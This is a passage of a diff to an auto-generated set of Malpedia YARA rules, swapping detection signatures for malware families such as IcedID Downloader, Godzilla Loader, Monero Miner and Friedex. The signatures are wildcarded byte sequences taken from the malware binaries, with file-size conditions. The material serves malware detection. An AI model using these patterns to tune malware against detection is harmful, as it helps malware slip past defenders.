894b10 03f2 8bd1 8bf8 c1e902 f3a5 8bca } - $sequence_9 = { 17 08cb 8291975b9c2acc 8f81509c02d5 96 9e 664e } + $sequence_0 = { 6880000000 8d85d4fcffff 52 50 e8???????? } + $sequence_1 = { 40 83f810 7cee 83ee10 4f 75ac 33c0 } + $sequence_2 = { 81e1ff000000 83c010 331cad30a44000 8b68f8 } + $sequence_3 = { e8???????? 8d8560ffffff 68???????? 50 e8???????? ffb6eca94000 } + $sequence_4 = { 81e5ff000000 333cad30a44000 8b68fc 33fd 8bea } + $sequence_5 = { f3a5 ff249578334000 8bc7 ba03000000 } + $sequence_6 = { 33c9 897c2418 8a6e08 8a4e09 } + $sequence_7 = { c1ea18 81e5ff000000 330c9530984000 8bd7 81e2ff000000 330c9530a44000 8b10 } + $sequence_8 = { 8b34b530984000 8b1cbd309c4000 c1e908 33f3 81e1ff000000 8b0c8d30804000 } + $sequence_9 = { 8bf1 c1f805 83e61f 8d3c8580c54000 c1e603 8b07 } condition: - 7 of them and filesize <1138688 + 7 of them and filesize <101688 } -rule MALPEDIA_Win_Postnaptea_Auto : FILE +rule MALPEDIA_Win_Photofork_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "66a4e77d-c854-5ed3-94ad-0ea65d80b627" + id = "f7484eb7-9c89-5a31-aecd-73c9087aa29d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.postnaptea" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.postnaptea_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photofork" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.photofork_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "8a33afe097a88ce8212670a3e80b58d6a5513693490a76a85e445ee8529ba924" + logic_hash = "ff7473e2612dfba9efd366e89c657d77862d4c88088d1b5f47bab69cec947ba6" score = 75 quality = 75 tags = "FILE" @@ -161592,34 +164377,34 @@ rule MALPEDIA_Win_Postnaptea_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c744247418f561f5 c744247867f50000 4863c2 488d4c2450 488d0c41 0fb7c2 662bc3 } - $sequence_1 = { ffc2 83fa1a 72e3 6644896c2474 488d442440 488bd3 0f1f440000 } - $sequence_2 = { ffd7 85c0 0f842c010000 4c8d052d4b0600 ba04010000 498bce e8???????? } - $sequence_3 = { e9???????? 418b8520280000 4d8bce 48634c2440 4c8bc6 2bc1 48034c2460 } - $sequence_4 = { c745c000f50cf5 c745c407f528f5 c745c80cf508f5 c745cc02f53cf5 c745d006f50bf5 c745d419f50bf5 c745d81bf54ef5 } - $sequence_5 = { ff15???????? 4533e4 4d85f6 0f8418100000 498bce e9???????? 448b85b0000000 } - $sequence_6 = { c7851001000031f56df5 c785140100006df54ef5 c7851801000005f50ef5 c7851c0100000ff50000 418bd4 0f1f440000 4863c2 } - $sequence_7 = { c78520020000a081b081 c78524020000a281ba81 c78528020000fa81b181 c7852c020000ba81bb81 33c0 66898530020000 418bd5 } - $sequence_8 = { 488b05???????? 4885c0 7515 488d55b0 b9bd59e821 e8???????? 488905???????? } - $sequence_9 = { ffd7 c7856007000079f57af5 c785640700007bf515f5 c785680700000df528f5 c7856c0700006bf540f5 c7857007000020f506f5 c7857407000007f516f5 } + $sequence_0 = { 33c9 4c8d85f0010000 ff15???????? 33db } + $sequence_1 = { 4885d2 7431 488b9278010000 4885d2 753a ba01000000 33c9 } + $sequence_2 = { 4d85c9 7535 8d5301 33c9 } + $sequence_3 = { ff15???????? 4863c8 48ffc6 4803f9 493bf7 0f825fffffff } + $sequence_4 = { 4c8b0d???????? 4d85c9 7430 4d8b8910110000 4d85c9 } + $sequence_5 = { 488d55e8 498bcc e8???????? 4c8bbc2498000000 } + $sequence_6 = { 5e 5d c3 498bdf 6690 80bbc001000030 } + $sequence_7 = { 48ffc1 4883f903 72ea 448b4df8 488d0c7e } + $sequence_8 = { 488bd0 488b05???????? 48899040060000 488d4dc0 ffd2 66837dc009 b840000000 } + $sequence_9 = { 8b44246c 0fb6442468 84c0 7520 } condition: - 7 of them and filesize <2457600 + 7 of them and filesize <99328 } -rule MALPEDIA_Win_Simplefilemover_Auto : FILE +rule MALPEDIA_Win_Dairy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "21ae03b9-45c9-58fd-b17b-9f1c4dcf7bf7" + id = "6e188396-140d-58db-bd0e-fbec36fd2177" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.simplefilemover" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.simplefilemover_auto.yar#L1-L219" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dairy_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "81c6919dbb4aaa2e054461ca67f688251b4ccec2baef13a001955aba375181dd" + logic_hash = "549c203eee4759a62625d82431309a24967248eb704aef7aff9b67e4e84189f3" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -161631,44 +164416,32 @@ rule MALPEDIA_Win_Simplefilemover_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bfc f3a5 e8???????? 81c420020000 } - $sequence_1 = { 33c0 e9???????? 6820020000 ff15???????? } - $sequence_2 = { 81c420020000 85c0 7407 68???????? eb05 68???????? ff15???????? } - $sequence_3 = { b988000000 8bf3 8bfc f3a5 } - $sequence_4 = { 33ff 884c2408 3bf7 88542424 897c2410 } - $sequence_5 = { 7503 8bfa 46 668b4102 83c102 42 } - $sequence_6 = { 8b8d54faffff 51 ff15???????? 6a00 6800200000 8d9554daffff } - $sequence_7 = { 8b8554faffff 50 ff15???????? 85c0 } - $sequence_8 = { 8b74241c 57 8a8800010000 8a9001010000 33ff } - $sequence_9 = { ebc2 ebc0 ebbe ebbc ebba ebb8 } - $sequence_10 = { e8???????? 81c420020000 85c0 7410 68???????? ff15???????? } - $sequence_11 = { 8b4c2414 8d447b02 50 51 } - $sequence_12 = { 5f 889000010000 888801010000 5e 83c410 c3 } - $sequence_13 = { e9???????? 807d0867 0f848f020000 807d0870 0f8513040000 } - $sequence_14 = { 83bd08daffffff 7409 83bd08daffff00 750f c78508daffff00000000 e9???????? 6a04 } - $sequence_15 = { 47 897c2418 0fbfff 3bfb 0f8c54ffffff 8a4c242c } - $sequence_16 = { 6a64 ff15???????? ff4de0 395de0 7fd4 } - $sequence_17 = { 52 8d855cfaffff 50 8d8d60daffff 51 } - $sequence_18 = { 8d85b0ddffff 50 e8???????? 8d45dc 57 50 8b45f4 } - $sequence_19 = { 50 ff7610 6a00 6a00 ffd7 ff7508 8d4302 } - $sequence_20 = { 8b4c2408 8b742424 53 81e1ff000000 } - $sequence_21 = { 53 52 ff15???????? 83c408 5f 5e } + $sequence_0 = { 5b 81c48c050000 c3 668b15???????? } + $sequence_1 = { 68???????? 52 e8???????? 83c40c 85c0 752e } + $sequence_2 = { 83c408 8bc6 5f 5e 5d 81c424030000 c3 } + $sequence_3 = { be01000000 5b 57 ff15???????? 55 e8???????? 83c404 } + $sequence_4 = { 8d542418 52 57 e8???????? 85c0 7414 6a00 } + $sequence_5 = { 4b 81cb00fcffff 43 2bc3 } + $sequence_6 = { 85c0 0f8ef6000000 8b550c 53 56 52 e8???????? } + $sequence_7 = { f3a5 8bca 8d54243c 83e103 f3a4 83c9ff } + $sequence_8 = { 49 51 8d8c2408010000 51 53 e8???????? 83c40c } + $sequence_9 = { 81e3ff030080 7908 4b 81cb00fcffff 43 2bc3 33ff } condition: - 7 of them and filesize <57344 + 7 of them and filesize <212992 } -rule MALPEDIA_Win_Halfrig_Auto : FILE +rule MALPEDIA_Win_Monero_Miner_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4f3cbac9-fb70-5f5f-a1a6-aa00243a3db8" + id = "e4c7050e-9186-5f1e-9d47-976e6a4001a0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.halfrig" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.halfrig_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.monero_miner_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "fd3e289580ee05538ff1447ee4a76bbaba1a2cf6f44fe795cbd300f7fc8296a1" + logic_hash = "7e4796fa5a31551e9b057737783d58401a472a7bae7889a290c988c1aea0c1dd" score = 75 quality = 75 tags = "FILE" @@ -161682,32 +164455,32 @@ rule MALPEDIA_Win_Halfrig_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 833d????????ff 752a 488d0dee900400 c705????????679f9b01 c705????????6680ec92 c705????????3f7d27f5 e8???????? } - $sequence_1 = { 833d????????ff 7539 488d0d67740400 66c705????????fd01 c705????????6881e28d } - $sequence_2 = { e8???????? 488d0d6c950700 e8???????? 40383d???????? 7435 660f1f440000 } - $sequence_3 = { 75ad 0fb600 498bcf 8802 488d542420 e8???????? 488d0d58c70600 } - $sequence_4 = { 48c1e008 488bd1 49ffc0 4833d0 4983f80f 72db 408835???????? } - $sequence_5 = { 8802 488d542420 e8???????? 488d0d4cef0900 e8???????? 40383d???????? } - $sequence_6 = { 488d542420 e8???????? 488d0d08830600 e8???????? 40383d???????? 7435 488bd3 } - $sequence_7 = { 75ad 0fb600 498bcf 8802 488d542420 e8???????? 488d0df8da0500 } - $sequence_8 = { 8802 488d542420 e8???????? 488d0df8930600 e8???????? 40383d???????? } - $sequence_9 = { 488d0d88080800 e8???????? 40383d???????? 7435 } + $sequence_0 = { 0fb65508 034d04 035d00 01d0 e9???????? 0fb77508 034d04 } + $sequence_1 = { 8b842490000000 895f40 338424ac000000 8b9c2444010000 31cd 8b8c2440010000 31de } + $sequence_2 = { 8b442460 31f5 8bb42488000000 03742460 896c2438 89c5 897c243c } + $sequence_3 = { 8b4c2424 c7042400000000 89442404 8b442420 e8???????? 85c0 89c3 } + $sequence_4 = { 8b54245c 09ce 89b424f0010000 897738 89ac24f4010000 896f3c 0fa4c204 } + $sequence_5 = { 8d4c2427 89742414 895c240c 897c2408 c744240400000000 83e1f0 8b7de0 } + $sequence_6 = { 89bc24c0010000 89ac24c4010000 8bac24c8040000 036c2420 8b742460 8bbc24cc040000 137c2424 } + $sequence_7 = { c744240423000000 8b85c0040000 890424 e8???????? 85c0 7403 c60000 } + $sequence_8 = { e8???????? 8d4b50 8d5705 c7435c00000000 c7435800000000 c7435400000000 895350 } + $sequence_9 = { 8b8424b0010000 899424c4010000 8b9424b4010000 89ac24c0010000 01c1 89c5 11d3 } condition: - 7 of them and filesize <1369088 + 7 of them and filesize <1425408 } -rule MALPEDIA_Win_Tandfuy_Auto : FILE +rule MALPEDIA_Win_Friedex_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "38730032-1555-50d4-b759-37b770d675ac" + id = "97d1751f-5738-5834-8f82-479344539d3a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tandfuy_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.friedex_auto.yar#L1-L172" license_url = "N/A" - logic_hash = "7ea6bc2b0de15e30b85cc41fe9dae28b9e373e31fa36302d55838d87545cc73b" + logic_hash = "8dffa1fb6804412157c235a0ef3196dc0c5961e846d30c21c59180ff32555e60" score = 75 quality = 75 tags = "FILE" @@ -161721,32 +164494,38 @@ rule MALPEDIA_Win_Tandfuy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 52 8b942458010000 25ff000000 81e1ff000000 50 } - $sequence_1 = { f68221eb6e0004 7403 40 ff01 ff01 40 e9???????? } - $sequence_2 = { e8???????? 83c404 85c0 0f8440010000 b93e000000 33c0 8dbdd8f9ffff } - $sequence_3 = { 8bec 8b4508 ff3485a0d66e00 ff15???????? 5d c3 55 } - $sequence_4 = { 6a00 51 6a02 52 56 ff15???????? 56 } - $sequence_5 = { 52 33c9 8a4801 51 33d2 8a10 } - $sequence_6 = { f3ab 8dbc2474020000 83c9ff f2ae f7d1 2bf9 8bc1 } - $sequence_7 = { 7562 b8???????? 81c49c000000 c3 83f806 7551 } - $sequence_8 = { 8d95e8feffff 8b7d08 83c9ff 33c0 f2ae f7d1 } - $sequence_9 = { 6800000080 56 f3ab ff15???????? 8bd8 } + $sequence_0 = { e8???????? 57 8bc8 e8???????? 6a26 } + $sequence_1 = { c20c00 51 51 53 55 8be9 c744240820090d0a } + $sequence_2 = { 1adb e8???????? 6a20 5f } + $sequence_3 = { 74f9 33c9 663908 0f94c0 5f 5e 5d } + $sequence_4 = { 663910 7431 8bd8 8d7102 eb1d } + $sequence_5 = { 5f 5b 5e 5d c20c00 51 } + $sequence_6 = { 75c1 6a2a 5f eb06 b001 eb0f 03c5 } + $sequence_7 = { 6a00 ff760c ffd0 8b442408 5e } + $sequence_8 = { 8955e0 e8???????? 8d0dd830a500 890424 894c2404 e8???????? } + $sequence_9 = { 8d055a23a500 31c9 8d55d8 803d????????e9 8955d4 8945d0 } + $sequence_10 = { 8a2c057530a500 83c001 38e9 8945a0 8955cc 74bc } + $sequence_11 = { 8d055a23a500 5d c3 55 } + $sequence_12 = { c7424458270000 c7424800100100 8b7de4 c787cc00000000000000 c787c800000000000000 } + $sequence_13 = { 8b45a4 8a4daf 31d2 8a2c057530a500 83c001 38e9 } + $sequence_14 = { 8d0dc930a500 890424 894c2404 e8???????? 8d0d4430a500 31d2 8b75f8 } + $sequence_15 = { 8d0d4430a500 31d2 890c24 c744240400000000 } condition: - 7 of them and filesize <155648 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Wmighost_Auto : FILE +rule MALPEDIA_Win_Godzilla_Loader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0b0db58b-a86c-5fcd-a072-2eb1cc17420a" + id = "0aa53e21-de31-5ee8-9359-dc9a54a6a8e0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wmighost_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.godzilla_loader_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "ca34789fba1f2bd4e0c465ce04013e3b6750b48b70cd8c7936238cd0c587d01a" + logic_hash = "2d34f8359c26dd7b822a9bcedc09c50858c69dbe831cef14ec0430298405abb3" score = 75 quality = 75 tags = "FILE" @@ -161760,32 +164539,32 @@ rule MALPEDIA_Win_Wmighost_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 52 e8???????? 83c40c 68e8030000 ff15???????? e9???????? } - $sequence_1 = { 83c408 68???????? 8d8df0fcffff 51 } - $sequence_2 = { c745fc00000000 8d4d08 e8???????? 50 8b45e8 8b08 } - $sequence_3 = { 8945fc 837dfcff 7505 e9???????? 6a02 } - $sequence_4 = { 8b550c 52 8d85f0fcffff 50 e8???????? 83c408 } - $sequence_5 = { 33c1 8b55f8 8882c8304000 8b45f8 0fbe88c8304000 33d2 8a15???????? } - $sequence_6 = { 66ab aa c685f0fcffff00 b940000000 33c0 8dbdf1fcffff } - $sequence_7 = { 50 8b4df0 51 e8???????? c745fcffffffff 8d4d08 e8???????? } - $sequence_8 = { 8dbdfdfeffff f3ab 66ab aa c685f0fcffff00 b940000000 } - $sequence_9 = { 8955e4 8b45ec 50 8b4de4 51 6aff } + $sequence_0 = { 50 a5 ff512c 85c0 756c } + $sequence_1 = { a5 50 a5 ff512c 85c0 756c } + $sequence_2 = { 7406 8b08 50 ff511c } + $sequence_3 = { a5 ff512c 85c0 756c } + $sequence_4 = { 6a00 8bf8 8d45fc 50 57 6a01 56 } + $sequence_5 = { 51 56 57 ff7508 ff15???????? 8bf0 56 } + $sequence_6 = { 52 50 ff91f0000000 85c0 7813 } + $sequence_7 = { 6a00 6a00 8bf8 8d45fc 50 57 } + $sequence_8 = { 57 6a01 56 ff7508 8975fc } + $sequence_9 = { 8b08 50 ff11 85c0 7527 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <155648 } -rule MALPEDIA_Win_Icedid_Downloader_Auto : FILE +rule MALPEDIA_Win_Gaudox_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1dc8b5e6-58e8-56f8-b32a-539ebf38d462" + id = "1eecaa5e-0125-509a-9dab-e8ce2f4b63fe" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.icedid_downloader_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gaudox_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "f3e7c7707c4dd480b8c042e3891161f91628584450f48860513befa5fa6f9a3b" + logic_hash = "7eb2982f230b20ae36bb88377d3dc0b3ae4c2623263daca498d5416d3995e6aa" score = 75 quality = 75 tags = "FILE" @@ -161799,32 +164578,32 @@ rule MALPEDIA_Win_Icedid_Downloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb1c 83f803 7519 8b06 } - $sequence_1 = { e8???????? 8365f400 8d45b0 8945f8 64a118000000 59 59 } - $sequence_2 = { 8d4568 50 8d4558 50 8d45c8 6a04 } - $sequence_3 = { 8d75d4 33c0 c745dc00330000 6a16 } - $sequence_4 = { ff7508 895dfc 895df4 895df8 895dec 895de4 } - $sequence_5 = { ffd7 ff15???????? 83f87a 0f85e9000000 8b442410 85c0 0f84dd000000 } - $sequence_6 = { 894528 8d4518 50 ff15???????? } - $sequence_7 = { 89442408 8944240c 8bf0 8944241c 8d442408 } - $sequence_8 = { 50 53 53 53 6a04 ff75fc e8???????? } - $sequence_9 = { 6689442434 8d54242c 8b442414 52 57 } + $sequence_0 = { 7403 c60000 8bce e8???????? 8b45f8 85c0 7410 } + $sequence_1 = { 837df000 0f849a000000 6a00 8d95c4feffff 52 b804000000 6bc800 } + $sequence_2 = { 8d8c2458030000 e8???????? 8bf0 85f6 0f88df000000 a1???????? 8d8c2450030000 } + $sequence_3 = { a1???????? 57 ffb0b8000000 eb26 8bb8b0000000 83ff54 } + $sequence_4 = { 13c9 66f3ab 8b450c 03f0 8bc6 5f 5e } + $sequence_5 = { 56 8b7014 81feb8000000 7729 68???????? b9???????? e8???????? } + $sequence_6 = { ff75fc 8bf0 6a08 6a00 e8???????? 85f6 782a } + $sequence_7 = { 8b45f4 8b5018 85d2 74ec 6a00 6a00 68d113282e } + $sequence_8 = { 57 85c0 0f84ad010000 85d2 0f84a5010000 8b7d08 85ff } + $sequence_9 = { 8d442460 50 6a27 6a00 e8???????? 85c0 781c } condition: - 7 of them and filesize <40960 + 7 of them and filesize <155648 } -rule MALPEDIA_Win_Cabart_Auto : FILE +rule MALPEDIA_Win_Unidentified_042_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ec8b7b53-684b-5fca-bc08-508467faa1aa" + id = "9e093b61-c910-5742-8226-775531f91d9d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cabart_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_042_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "ef91551af86c18985e4a8081f5258aef75a9aeccca976feccaee2997d09b19b6" + logic_hash = "7aca5d090ae8281044c7e148c75c276642daf90859ffb2907ade4921d2dec5c9" score = 75 quality = 75 tags = "FILE" @@ -161838,32 +164617,32 @@ rule MALPEDIA_Win_Cabart_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8930 8b4510 eb16 395d10 740f } - $sequence_1 = { 8d8500fcffff 50 ff35???????? be00020000 ff35???????? } - $sequence_2 = { 3bc3 7620 8d4df0 51 50 } - $sequence_3 = { 33c0 66898506fcffff 8d8500fcffff 50 ff35???????? be00020000 } - $sequence_4 = { 8d0c30 3bcf 7732 3bc3 } - $sequence_5 = { 8d85fcfeffff 68???????? 6804010000 50 ff15???????? 83c410 6a10 } - $sequence_6 = { 85db 750a 68b90b0000 e8???????? 85ed } - $sequence_7 = { 3bc7 750a 68ec030000 e9???????? 8bc8 } - $sequence_8 = { 57 8d45e8 50 6a58 56 } - $sequence_9 = { ff15???????? 57 8d45f4 50 6a3f 56 c745f40a000000 } + $sequence_0 = { 85c0 754f 6a02 53 56 8d8d9cfeffff 57 } + $sequence_1 = { 56 8d8d68e1ffff 51 8d9554f7ffff 52 89b550f7ffff } + $sequence_2 = { 5b 85c0 78dd 8b45fc 8b55f8 0fb64c3801 4a } + $sequence_3 = { 8b4db8 895640 8b9518fdffff 895620 8b9520fdffff 894e44 8b8d1cfdffff } + $sequence_4 = { 8d8580cbffff 50 6a00 ff15???????? 85c0 7527 8b1d???????? } + $sequence_5 = { 5e 8bc7 5f 5d c3 8b7514 85f6 } + $sequence_6 = { 8bc3 2bc2 8d0c91 2bf0 42 8d3c87 3bf2 } + $sequence_7 = { 85db 0f85af000000 8d45ac 8bf0 8d5d9c 50 } + $sequence_8 = { 8d4df8 51 8d5df4 e8???????? 83c408 85c0 780d } + $sequence_9 = { 52 50 8d4b70 e8???????? 83c408 85c0 0f850b020000 } condition: - 7 of them and filesize <32768 + 7 of them and filesize <516096 } -rule MALPEDIA_Win_Ddkong_Auto : FILE +rule MALPEDIA_Win_Icedid_Downloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0544faa5-2134-56f3-b2ce-99d63d7f2f59" + id = "1dc8b5e6-58e8-56f8-b32a-539ebf38d462" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ddkong_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.icedid_downloader_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "5c0b95ff5255c02a1d1a9b0883f78a353561d54588ac72196452124efb25472a" + logic_hash = "f3e7c7707c4dd480b8c042e3891161f91628584450f48860513befa5fa6f9a3b" score = 75 quality = 75 tags = "FILE" @@ -161877,32 +164656,32 @@ rule MALPEDIA_Win_Ddkong_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c6459765 c6459857 c645996f c6459a77 c6459b36 c6459c34 c6459d46 } - $sequence_1 = { c68572ffffff62 c68573ffffff6a c68574ffffff65 c68575ffffff63 c68576ffffff74 889d77ffffff ffd7 } - $sequence_2 = { c645d36c c645d465 c645d54e c645d661 c645d76d c645d865 c645d941 } - $sequence_3 = { 5b 5d c20c00 ff25???????? ff25???????? 8b4c2404 85c9 } - $sequence_4 = { c645f470 ffd6 50 ffd7 8b5d0c bf04010000 } - $sequence_5 = { 6a04 e8???????? 83c418 eb2d 6a01 } - $sequence_6 = { 7427 837d08ff 7421 8d45dc 6a10 50 ff7508 } - $sequence_7 = { c6855affffff65 c6855bffffff4f c6855cffffff62 c6855dffffff6a c6855effffff65 } - $sequence_8 = { c6459763 c6459874 c6459969 c6459a76 c6459b65 c6459c43 c6459d6f } - $sequence_9 = { c68574ffffff65 c68575ffffff63 c68576ffffff74 889d77ffffff } + $sequence_0 = { eb1c 83f803 7519 8b06 } + $sequence_1 = { e8???????? 8365f400 8d45b0 8945f8 64a118000000 59 59 } + $sequence_2 = { 8d4568 50 8d4558 50 8d45c8 6a04 } + $sequence_3 = { 8d75d4 33c0 c745dc00330000 6a16 } + $sequence_4 = { ff7508 895dfc 895df4 895df8 895dec 895de4 } + $sequence_5 = { ffd7 ff15???????? 83f87a 0f85e9000000 8b442410 85c0 0f84dd000000 } + $sequence_6 = { 894528 8d4518 50 ff15???????? } + $sequence_7 = { 89442408 8944240c 8bf0 8944241c 8d442408 } + $sequence_8 = { 50 53 53 53 6a04 ff75fc e8???????? } + $sequence_9 = { 6689442434 8d54242c 8b442414 52 57 } condition: - 7 of them and filesize <81920 + 7 of them and filesize <40960 } -rule MALPEDIA_Win_Plurox_Auto : FILE +rule MALPEDIA_Win_Imprudentcook_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6592f7da-a1c0-54df-8b9b-d6d4f0de3577" + id = "da16e08a-4583-5528-aff9-b355b3ccc1ad" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.plurox_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.imprudentcook" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.imprudentcook_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "2767330918862f71924876620bde24f2504b741e0c74e8fbd24789f747d1fbb9" + logic_hash = "dc1ba99de715ff44414f303429509d324c0251135a2ef150545d89588c26b553" score = 75 quality = 75 tags = "FILE" @@ -161916,32 +164695,32 @@ rule MALPEDIA_Win_Plurox_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 90 f9 0925???????? 0000 } - $sequence_1 = { 1a6e00 0000 94 624a8b 0416 } - $sequence_2 = { 6f b804000000 4e 4f b84e4f3dd9 } - $sequence_3 = { 94 f8 21480e 2a15???????? 6f b804000000 } - $sequence_4 = { e9???????? e408 6873d30808 94 e519 e8???????? 0000 } - $sequence_5 = { 8918 43 0416 0a20 0816 ec bbf2000000 } - $sequence_6 = { 8a00 46 0c83 47 } - $sequence_7 = { 624a8b 0416 128bc606091a f6870f1a000000 e10d } - $sequence_8 = { 07 f3cf 6b0000 0025???????? 7171 6805245f07 40 } - $sequence_9 = { 64841a 6c 2432 3449 } + $sequence_0 = { 488d3c0b 483bf9 4983d200 4883ee18 4d03da 4d03d9 48ffcd } + $sequence_1 = { 4983c708 4983c508 48ffc9 75ec 49894500 488b5520 488d4fff } + $sequence_2 = { 4d8bc4 498bd2 eb08 4c89642420 4c8bc7 } + $sequence_3 = { 488d04ed00000000 4c03f5 4803f5 48ffc3 4c03f8 4c3bf7 7ec8 } + $sequence_4 = { 4c8bcf 4d8bc5 498bd4 e8???????? 488b9580000000 41b901000000 4d8bc6 } + $sequence_5 = { 4d3bfe 0f8c45ffffff 4c8bac2488000000 4f8d7c2d00 498bde 4d3bf7 } + $sequence_6 = { 8807 e9???????? 81fb0b000100 0f8dfb030000 81fb0000007e 0f87f7030000 85db } + $sequence_7 = { 4803c2 48c1f806 488bf8 488bd8 488b8424c0000000 4c8d1cf8 48c1e306 } + $sequence_8 = { 4833c2 482bc2 488bd3 493bc2 7d1a 4c895c2428 4c89442420 } + $sequence_9 = { e9???????? 48ffcd b938000000 90 488bc3 48d3e8 84c0 } condition: - 7 of them and filesize <475136 + 7 of them and filesize <864256 } -rule MALPEDIA_Win_Xiangoop_Auto : FILE +rule MALPEDIA_Win_Salgorea_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bc98151f-3c19-5785-9ae3-c69b23dbc040" + id = "485be719-ad86-58c5-b98c-1fa9d3a194c2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiangoop" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xiangoop_auto.yar#L1-L122" + reference = 